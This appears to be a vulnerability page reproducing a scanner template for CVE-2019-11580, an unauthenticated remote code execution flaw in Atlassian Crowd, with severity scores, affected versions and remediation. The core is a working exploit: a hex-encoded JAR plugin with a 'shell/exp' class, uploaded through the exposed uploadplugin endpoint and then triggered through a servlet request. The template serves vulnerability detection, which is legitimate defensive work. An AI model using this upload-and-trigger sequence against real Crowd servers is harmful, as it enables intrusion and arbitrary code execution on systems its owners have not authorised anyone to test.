9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.974 High
EPSS
Percentile
99.9%
Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
id: CVE-2019-11580
info:
name: Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution
author: dwisiswant0
severity: critical
description: Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system, leading to complete compromise of the system.
remediation: |
Upgrade to Atlassian Crowd and Crowd Data Center version 3.4.3 or later to mitigate this vulnerability.
reference:
- https://github.com/jas502n/CVE-2019-11580
- https://jira.atlassian.com/browse/CWD-5388
- https://nvd.nist.gov/vuln/detail/CVE-2019-11580
- http://packetstormsecurity.com/files/163810/Atlassian-Crowd-pdkinstall-Remote-Code-Execution.html
- https://github.com/Elsfa7-110/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-11580
epss-score: 0.97441
epss-percentile: 0.99943
cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: atlassian
product: crowd
shodan-query: http.component:"Atlassian Jira"
tags: cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth
variables:
plugin: '{{hex_decode("504b0304140000000800033f2557544c2527eb0000000402000014001c0061746c61737369616e2d706c7567696e2e786d6c555409000316dff66410e4f66475780b000104e803000004e80300007d91416ec3201045d7ce29107b20c91a23e50039c4044f53140c16e0a8bd7d260527ae5595dd7c66febc0f1a8a879c1d0431f9f9ea02bbe177cf6d1ca51dbccc9fe8bdc4af89b30023f6fcb4b4b33304b862e2acce6571c7945d0c3d3f72669f5d7fd9981da3a3eb8c70e12356a5aa90606c8bde5c0314101643c124c87082e22e1eb9296946ad7e66561e03669bdc5488c46c61473269b85aad1bdfe32d8439c8bddc6bb594955afdc2de753a63ba7b2c0d99f2f9e80aaf4ff8aafe798beee93a272f2814c50b4691aed55aa93d6bd80bd8db106362505823caaa9128dab089d6e9e59290b5dafe37890f504b03040a0000000000033f255700000000000000000000000004001c00636f6d2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000033f255700000000000000000000000008001c00636f6d2f63646c2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000854225570000000000000000000000000e001c00636f6d2f63646c2f7368656c6c2f5554090003b9e4f664b9e4f66475780b000104e803000004e8030000504b0304140000000800bd422557a3de4c61670100004602000017001c00636f6d2f63646c2f7368656c6c2f6578702e636c617373555409000326e5f664b9e4f66475780b000104e803000004e80300008d51c94e0241107d25cb208c22e2bea05e0c18b1c1c4a8c17821b824440d183c237470cc3883330df25b5e347af003fc2863b5b870523be95a5ebfeaaa7efdfaf6fc02601bcb51849188611cc90826a298c4948169033384f09ee5586a9f1048676a8460d16d4a42bc6c39f2a4737329bdf3faa5cd48a8e91e4a45a8a4cbd7f56ebd277ce9756da9c495526d71c4a6da072af2b6237d55f893e6b75dc79705dd355aea35645b590c1898e5bcea76bc863cb074e788ecb537f465260c440ccc9998c70261b4582b653773f9dd6c3ebfb59333b06822852542a2e1de8846d316fe95b46dc1e584d4efd310929a202c571c9f7e0f4358fddf2308c32da92e3c4b498f309dce94bf6e3bf32ce7f3a030d064006669ef744098ec4b2becbad31255c59416ab831584f8f7f41a026909d80e73b6c89ed887d61e41f71cb06e6cc31fa0b631985ca2a969f601f6e6fa138608e38107047f2aa27c0ae6c5381ae128c8f828eff847cbb177504b03041400000008003a422557483e79dabf0000000f01000016001c00636f6d2f63646c2f7368656c6c2f6578702e6a617661555409000330e4f66430e4f66475780b000104e803000004e8030000558e416bc3300c85effe15a2a7642ca2290c36721c61eda9d0417bf61cd1787363d75293c0c87fafdbf5903d1008bdf73d14b4f9d14702e34f681a87dc92739552f6147c14f8d6bd1e9129f68e045b91804fd5dc44eb71b3ad474341acef12192e5fce1a304e33038d218d50d730ac13fdf9d704bf4a41d223db7bdb40e33f48b2596847e70bb140a4f333fcbb73f01d5332380769a31f18663fa472782825f0487288562866390eb7255bbcefeb62b52cdf8ab27c795d2ef2ea0e4c6a5257504b01021e03140000000800033f2557544c2527eb00000004020000140018000000000001000000fd810000000061746c61737369616e2d706c7567696e2e786d6c555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000040018000000000000001000fd4139010000636f6d2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000080018000000000000001000fd4177010000636f6d2f63646c2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000854225570000000000000000000000000e0018000000000000001000fd41b9010000636f6d2f63646c2f7368656c6c2f5554050003b9e4f66475780b000104e803000004e8030000504b01021e03140000000800bd422557a3de4c616701000046020000170018000000000000000000b48101020000636f6d2f63646c2f7368656c6c2f6578702e636c617373555405000326e5f66475780b000104e803000004e8030000504b01021e031400000008003a422557483e79dabf0000000f010000160018000000000001000000b481b9030000636f6d2f63646c2f7368656c6c2f6578702e6a617661555405000330e4f66475780b000104e803000004e8030000504b05060000000006000600ff010000c80400000000")}}'
http:
- raw:
- |
POST /crowd/admin/uploadplugin.action HTTP/2
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Content-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7
Expect: 100-continue
------------------------------f15fe87e95a7
Content-Disposition: form-data; name="file_cdl"; filename="rce.jar"
Content-Type: application/octet-stream
{{plugin}}
------------------------------f15fe87e95a7--
- |
GET /crowd/plugins/servlet/exp HTTP/2
Host: {{Hostname}}
matchers:
- type: word
part: body_2
words:
- "CVE-2019-11580"
# digest: 4b0a0048304602210087955d2448b57d1674ba2fbc9cc961254714818eba35f3288e5a4e190207809a022100d70c8dd4f92da6f2313c05a0892674a2e32c0c3385b8c14e5f18b2586c539e7a:922c64590222798bb761d5b6d8e72950
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.974 High
EPSS
Percentile
99.9%